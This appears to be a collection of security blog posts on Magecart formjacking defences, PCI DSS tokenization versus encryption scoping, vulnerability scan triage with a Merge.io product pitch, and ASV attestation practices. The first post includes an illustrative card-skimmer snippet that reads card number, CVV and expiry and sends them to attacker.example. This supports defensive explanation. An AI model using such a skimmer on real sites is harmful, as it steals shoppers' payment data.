The recent breaches at Ticketmaster, British Airways and Newegg that have been attributed to the hacking group Magecart have many e-commerce merchants taking a closer look at any potential exposure. And rightfully so.

The details of the credit card compromise have been well documented in several blogs. However, there is still a lack of detail surrounding how the attackers are obtaining access to the environments to modify the static JavaScript files. This is a significant gap in the available information. In each reported case, it appears that the attackers obtained access either to the file systems where the files were hosted or to some portion of the development and deployment pipeline in order to modify these files.

The inserted code that compromises the credit card data leverages the logical structure of the Document Object Model (DOM) to access and manipulate anything on the page. This includes the ability to send data to a malicious entity behind the scenes of a normally operating payment page, as in the case of these Magecart breaches. This technique is also known as formjacking. With access to the DOM, many common security measures are effectively bypassed, including the embedding of payment forms in iFrames and even the implementation of browser-based encryption intended to better secure payment data as it is collected from the customer.
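
To make the mechanism concrete, here is a minimal sketch of what injected skimmer code can look like. The form selectors, field names and exfiltration URL are hypothetical and are not taken from the actual Magecart payloads.

```typescript
// Hypothetical skimmer sketch: once attacker-controlled code runs in the page,
// it can read any field in the DOM and quietly send it elsewhere.
document.querySelector("#payment-form")?.addEventListener("submit", () => {
  const stolen = {
    pan: document.querySelector<HTMLInputElement>("#card-number")?.value,
    cvv: document.querySelector<HTMLInputElement>("#cvv")?.value,
    expiry: document.querySelector<HTMLInputElement>("#expiry")?.value,
  };
  // Fire-and-forget request to an attacker-controlled host (hypothetical URL).
  navigator.sendBeacon("https://attacker.example/collect", JSON.stringify(stolen));
});
```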

Once the attackers gain access to the source code, they own any data that you are collecting from the user.

To make things more difficult, today’s common web pages load dozens of scripts from many different locations. This includes scripts loaded from internal systems as well as from third-party providers. Any one of these scripts has the ability to manipulate data elements that are being collected from the customer.

I believe that this type of attack will continue to grow due to the number of possible infection vectors on a given page and the value of the customer data that is at risk. I also believe that this will eventually drive changes in the PCI council’s approach to e-commerce guidelines and requirements, hopefully placing more emphasis on server-based controls and a much needed focus on securing the source code and development pipeline.

What can we do to help reduce the risk of these types of attacks?

Secure the source code pipeline: So much of our technology world these days is powered by code, including infrastructure changes, automation and, of course, our applications. The entire code pipeline should be a focus for security controls to ensure the integrity of the code from source, to build, to deployment. Consider implementing hashing checks throughout this process and alerting when hashes do not match. This provides a mechanism to ensure that what was developed at least makes it to the intended destination.
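
As one illustration, a build step could record cryptographic hashes of the artifacts it produces so that later stages can verify them. This is a minimal sketch; the file paths and manifest format are assumptions rather than a prescription for any particular CI/CD tool.

```typescript
// Build-time sketch: record SHA-256 hashes of the build artifacts in a manifest
// that downstream stages (and the origin servers) can verify against.
// Paths and manifest layout are hypothetical.
import { createHash } from "crypto";
import { readFileSync, writeFileSync } from "fs";

const artifacts = ["dist/checkout.js", "dist/payment.js"]; // assumed build outputs

const hashFile = (path: string): string =>
  createHash("sha256").update(readFileSync(path)).digest("hex");

const manifest = Object.fromEntries(artifacts.map((file) => [file, hashFile(file)]));
writeFileSync("dist/manifest.json", JSON.stringify(manifest, null, 2));
```

The deployment stage can then recompute the hashes of what it actually received and refuse to proceed (or alert) on any mismatch.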

Secure the origin servers: Once our servers receive the validated source code, we should have a way to periodically check the code that is running to ensure that it hasn’t changed. This can be accomplished through various scripting methods, automation tools or open source tools such as OSQuery.
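
Continuing the earlier sketch, a periodic job on the origin server could recompute hashes of the deployed files and compare them with the build-time manifest. The paths, manifest location and check interval below are assumptions; this is the kind of check that tools like OSQuery can also perform natively.

```typescript
// Sketch of a periodic integrity check on an origin server: recompute hashes of
// the deployed files and compare them with the manifest produced at build time.
// Paths and the interval are hypothetical; wire the alert into real monitoring.
import { createHash } from "crypto";
import { readFileSync } from "fs";

const manifest: Record<string, string> = JSON.parse(
  readFileSync("/var/www/manifest.json", "utf8")
);

function checkOnce(): void {
  for (const [file, expected] of Object.entries(manifest)) {
    const actual = createHash("sha256").update(readFileSync(file)).digest("hex");
    if (actual !== expected) {
      console.error(`ALERT: ${file} has changed on disk`);
    }
  }
}

setInterval(checkOnce, 15 * 60 * 1000); // every 15 minutes (arbitrary interval)
```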

Implement Subresource Integrity checks: The use of Content Security Policies in conjunction with Subresource Integrity can ensure that files that your pages fetch from anywhere (third party, CDN or internal) have been delivered without any changes. This is accomplished by publishing cryptographic hashes of the known-good scripts that the browser verifies prior to execution. Once again it is important to note that if the attacker has access to the origin source code, all of this behavior can be modified.
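
For example, the integrity value is simply a base64-encoded digest of the exact file being served, and it can be generated as part of the build. The file name and CDN URL below are placeholders.

```typescript
// Sketch: generate a Subresource Integrity value for a script at build time.
// The file name and the example <script> tag URL are hypothetical.
import { createHash } from "crypto";
import { readFileSync } from "fs";

const body = readFileSync("dist/checkout.js");
const integrity = "sha384-" + createHash("sha384").update(body).digest("base64");

// The page would then reference the script along the lines of:
// <script src="https://cdn.example.com/checkout.js"
//         integrity="sha384-..." crossorigin="anonymous"></script>
console.log(integrity);
```
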
The added measures of knowing that the code you authored is what is running on your servers, and having visibility when that changes, can help reduce the risk of these types of attacks for your organization. Leverage automation as much as possible to ensure these measures don’t have a negative impact on the efficiency of deploying often.

Many organizations seek ways to reduce the scope for PCI DSS. While there are many different methods of reducing scope, I want to focus specifically on tokenization and encryption of the primary account number (PAN).

For the purposes of this post we will assume that the encryption and tokenization methods that are used meet the appropriate requirements to protect the PAN and that unauthorized attempts to reverse the token or encrypted value would be computationally infeasible. Additionally, I want to note that this post is not arguing the technical strengths or differences between tokenization and encryption; it is simply pointing out the council’s documented view on PCI DSS scope as it relates to the key and vault management aspects of these technologies.

Definitions

From the PCI Security Standards Glossary of Terms: Encryption is the process of converting information into an unintelligible form except to holders of a specific cryptographic key.

From the PCI DSS Tokenization Guidelines information supplement, tokenization is defined as a process by which the primary account number (PAN) is replaced with a surrogate value called a token. De-tokenization is the reverse process of redeeming a token for its associated PAN value.

For both tokenization and encryption, the overall principle is that valuable data is altered into non-valuable data through a given mechanism. For encryption, that mechanism is the encryption process and the keys. For tokenization, the mechanism is the tokenization process and the relationship between the token and the PAN. Additionally, the processes of de-tokenization and decryption are similar in that there is a process by which I provide my encrypted or tokenized data to a mechanism and receive the PAN in return.
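
To illustrate the parallel, here is a toy sketch only; a real token vault involves hardened storage, strict access control and far more than a lookup table, but the shape of the interface is the same: hand over the surrogate value, get the PAN back.

```typescript
// Toy illustration of the parallel between tokenization and encryption.
// Not a secure implementation: real systems rely on vetted cryptography,
// hardened vaults and strict key/vault access controls.
import { randomUUID } from "crypto";

const vault = new Map<string, string>(); // token -> PAN

function tokenize(pan: string): string {
  const token = randomUUID(); // surrogate value with no mathematical link to the PAN
  vault.set(token, pan);
  return token;
}

function detokenize(token: string): string | undefined {
  return vault.get(token); // exchanging the surrogate for the PAN
}

// Decryption plays the same role for encrypted data: supply the ciphertext
// (and have access to the keys) and receive the PAN in return.
```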

The tokenization guidance that is provided in the PCI DSS Tokenization Guidelines August 2011 notes that tokenization can be used as a method of reducing the scope of PCI in an organization. There are obviously many considerations for de-scoping using tokenization that are adequately covered in this document. But it is important to note that the document does not seem to link de-scoping with who manages the tokenization process, vault or tables.

The topic of de-scoping using encryption is covered by the PCI DSS FAQ article 2086 where it is noted that scope reduction can be achieved only if the merchant or service provider does not have access to the encryption keys.

If we follow this logic through to its conclusion, the council seems to be saying that tokenization can be used as a method for scope reduction without restriction to who manages the tokenization mechanism, but encryption can only be used if the merchant or service provider has no access to the keying mechanism.

Here we have nearly identical fundamental approaches to protecting data. Each deals with nonsensical data that can be exchanged for valid data through a particular mechanism. Depending on the details of the architecture, each has the capability of adequately securing cardholder data. However, it seems that the council has added additional rules around scope reduction using encryption vs. tokenization.

First of all, I do not believe that the council should be able to dictate the ability to de-scope based on a potential management issue. It is feasible to architect effective key management while keeping clear segregation of duties within the same organization or entity. I do not think it should be the council’s place to prohibit a solution based upon the predetermination that an organization cannot maintain effective segregation of duties or other risk mitigation strategies. An enterprise encryption strategy isn’t acquired as an off-the-shelf widget that I just plug in and turn on. There are many different potential elements that can make up a solution (one-time use, long-term storage, tokenization hybrid, etc.). It should be left up to the QSA to determine if the implemented solution meets the intent of the requirements.

But more important for the purposes of this discussion is the inconsistency in the view of two nearly identical fundamental approaches to protecting sensitive data and the accompanying keying systems. Why is the council’s position on these two scenarios different? I hope that the council will address this ambiguity in upcoming FAQs or supplemental documentation, as the current information that is available is contradictory in nature.

Converting mounds of vulnerability scan data into operational action is a challenge that many organizations face. One major part of that challenge is how to systematically boil down the volumes of vulnerability data to get to the vulnerabilities that you need to fix.

This is especially crucial when dealing with internal scans of larger networks. Internal vulnerability scanning tends to be a tricky process because, in most cases, very little access control is implemented between the scan engine and the target systems. With little access control in place, the vulnerability scanners produce a lot of vulnerability data to analyze. The question still remains: how do you make the most sense of the volume of data that is generated?

We begin with a policy and a process. Do you have established remediation thresholds for ranked vulnerabilities, and has management signed off on them? If not, start your journey here. Build an organizational policy that establishes a base set of conditions that determine which vulnerabilities must be remediated vs. vulnerabilities that are acceptable in a given environment. As an example, the policy/process may state that you remediate (per the defined remediation thresholds) any vulnerability that meets the following criteria for internal scans:

CVSS score of 5.5 or greater

SQL injection

Cross-site scripting

Since these are internal scans, there will be certain vulnerabilities that we will choose not to remediate. This could be due to environmental variables, compensating controls, etc. Examples of these may include:

Self-signed certificates

Denial of service vulnerabilities

These are obviously just examples, but each organization generally has vulnerabilities they want to remediate and vulnerabilities that they don’t, due to acceptable levels of risk. So how do you apply this logic in an automated fashion to your vulnerability data? The reality is that most companies that I deal with are still using Excel (the duct tape and baling wire of the business world) to accomplish this. And even with the use of spreadsheets, the process is highly manual.
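
The core include/exclude logic itself is simple to express in code. The sketch below mirrors the example policy above; the field names, thresholds and match patterns are illustrative only and this is not any particular product’s implementation.

```typescript
// Sketch of an include/exclude risk profile applied to scan findings.
// Field names, thresholds and match patterns are illustrative only.
interface Finding {
  title: string;
  cvss: number;
}

const matchesInclude = (f: Finding): boolean =>
  f.cvss >= 5.5 || /sql injection|cross.site scripting/i.test(f.title);

const matchesExclude = (f: Finding): boolean =>
  /self.signed certificate|denial of service/i.test(f.title);

function triage(findings: Finding[]) {
  const remediate = findings.filter((f) => matchesInclude(f) && !matchesExclude(f));
  const accepted = findings.filter((f) => matchesExclude(f));
  return { remediate, accepted };
}
```

Maintaining and re-running that kind of logic by hand in a spreadsheet is exactly where the manual effort piles up.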

This is where Merge.io can help out. With Merge.io you can create custom risk profiles that can determine which vulnerabilities from the imported data sets to remediate and which to exclude for acceptance. Just create the profile using the risk profile builder and apply it to a scan import. All of the vulnerabilities that match your include criteria will be added to the Merge.io workflow system. And the vulnerabilities that match the exclude filter will be excluded from workflow tracking.

Risk profile filters can be built that examine vulnerability CVSS score, risk rating, title, description, port, service, operating system and more.

These filters are available for use with any scan imported into Merge.io. They can be built to match your internal remediation standards and they can be added to over time as the organization changes. This provides an automated, repeatable approach to managing the volume of data that vulnerability scans can create.

Merge.io has a built-in filter for PCI that matches the requirements laid out by the PCI ASV Program Guide Version 2.0. Additional compliance filters are coming soon!

PCI requirement 11.2 requires merchants and service providers to conduct internal and external vulnerability scanning on their infrastructures. The requirements further state that the scanning activities should be repeated until clean scans are achieved.

The devil is indeed in the details when it comes to operationalizing what seems to be a simple concept. Companies struggle with how to effectively achieve clean scans when they are scanning many different assets running on multiple platforms that have different patching cycles.

Many companies create manual file comparisons using spreadsheets to compare scan files quarter over quarter. This manual comparison process can become exceedingly complex and time consuming.

In order to stop the vulnerability management “whack-a-mole,” we have incorporated an automatic validation feature into the Merge.io platform. This validation process allows you to automatically compare scan data against closed vulnerabilities to prove that the vulnerabilities have been remediated on the target systems.

Once a project is created and baseline scan data has been imported, the Merge.io platform provides a mechanism to allow continuous validation scan data to be imported into that project. For each validation scan file that is imported, Merge.io analyzes the data in the scan file, specifically looking for vulnerabilities that are in the “Closed-Approved” state on the Merge.io platform. If the vulnerability is not present in the validation scan file, then Merge.io marks the vulnerability as “Validated,” noting the uploaded scan file it was compared against. If the vulnerability still persists in the validation scan file, then Merge.io re-opens the vulnerability and assigns it back to the engineer who closed it.
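
The underlying comparison is straightforward; here is a rough sketch of the logic described above. The field names and state values are illustrative and are not the Merge.io schema.

```typescript
// Sketch of the validation pass described above: for each vulnerability that was
// closed in the platform, check whether it still appears in the new scan data.
// Field names and state values are illustrative, not the Merge.io schema.
interface Vulnerability {
  id: string;
  host: string;
  state: "Open" | "Closed-Approved" | "Validated";
  assignee: string;
}

function validate(tracked: Vulnerability[], scanFindings: Set<string>, scanFile: string): void {
  for (const vuln of tracked.filter((v) => v.state === "Closed-Approved")) {
    const key = `${vuln.host}:${vuln.id}`;
    if (scanFindings.has(key)) {
      vuln.state = "Open"; // still present in the scan: re-open and send back
      console.log(`Re-opened ${key}, assigned back to ${vuln.assignee}`);
    } else {
      vuln.state = "Validated"; // absent from the scan: proven remediated
      console.log(`Validated ${key} against ${scanFile}`);
    }
  }
}
```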

This closed-loop approach to vulnerability lifecycle management allows organizations not only to track the vulnerability state all the way through the vulnerability management process, but also to have assurance that each vulnerability has been proven not to persist.

Merge.io will be ready soon – feel free to contact us at info@merge.io for more information. Or sign up to be notified when it is released.

With the introduction of the ASV changes on September 1, 2010, ASVs were to begin providing merchants with an Attestation of Scan Compliance. The details of the attestation are documented in the ASV Program Guide v1.0, which was released in March of 2010.

The introduction of the attestation was intended to bring a reduction in errors with a more formal process of engagement between the merchant and ASV.

But exactly what is the ASV attesting to?
The ASV Program Guide version 1.2 requires that the ASV provide the merchant or service provider an Attestation of Scan Compliance attesting that the scan results meet PCI DSS Requirement 11.2 and the PCI DSS ASV Program Guide.

That’s not how I read it…
There seem to be some inconsistencies among ASVs as to what exactly they are attesting to as part of the required ASV Attestation of Scan Compliance. In working with different ASVs over the past years, I have come across three different methodologies for what an ASV is attesting to:

There should be NO vulnerabilities on a given host at the time of attestation

All identified vulnerabilities have been addressed within 30 days of when they were identified

All identified vulnerabilities must have been addressed within 90 days of when they were identified

As an example, Qualys (which supplies its scan tool to a large portion of the ASV industry) has implemented a rule within its platform that fails a given host if that host has not been scanned within the last thirty days. This supports its attestation methodology: vulnerabilities should be addressed within 30 days of when they were identified.

The differences in these methodologies have a huge impact on organizations with a large ASV scanning scope. It is very difficult for a large organization, running many different operating systems with different patch/release/test cycles, to achieve an attestation under these types of attestation requirements.

This is not necessarily an issue with patch timing; it’s an issue with the alignment of different patch cycles and how that is reflected in a particular scan. Let’s take an example: an ASV scan scope of 100 system components contains the following platforms:

Microsoft Windows

Redhat Linux

Cisco IOS

Juniper OS

HPUX

F5 Networks

This is a very plausible group of devices for an average enterprise. This group has six different platforms with six different patching release cycles. In order to meet the Qualys attestation requirements, this pool of 100 system components would have to be scanned every 30 days and reflect a “clean scan” with overlapping patch cycles somewhere within a quarterly cycle.

This approach also presents some inconsistencies with PCI DSS Requirement 6.1, which, as an example, allows a risk-based approach to prioritize less critical security patches for implementation beyond 30 days.

Where’s the sweet spot?
The ASV scanning element of the PCI requirements should be a validation that the merchant or service provider has a working program in place for patch and configuration management, providing proof that vulnerabilities are being addressed in accordance with PCI DSS 6.1 and 11.2. While the stricter attestation requirements from some ASVs reduce risk for the ASV, they can also create operational hurdles for larger organizations.

At this point in time, PCI DSS 11.2 provides no further clarification other than clean scans are required on a quarterly basis. If the merchant can prove to the ASV that vulnerabilities that were identified have been resolved within a 90-day period, I believe that this meets what is currently documented in 11.2.

Establishing the time frame in which vulnerabilities must be remediated should be based on risk to the organization while meeting the minimum bounds of the compliance requirements. It should be up to the merchant or service provider to establish these time frames according to their business risk. Unfortunately, in some circumstances, this timing is being established based on risk to the ASV and what they will attest to, not risk to the merchant and their operating environment.

Hopefully the highly anticipated next version of the PCI ASV Program Guide will bring some much needed clarification in this space.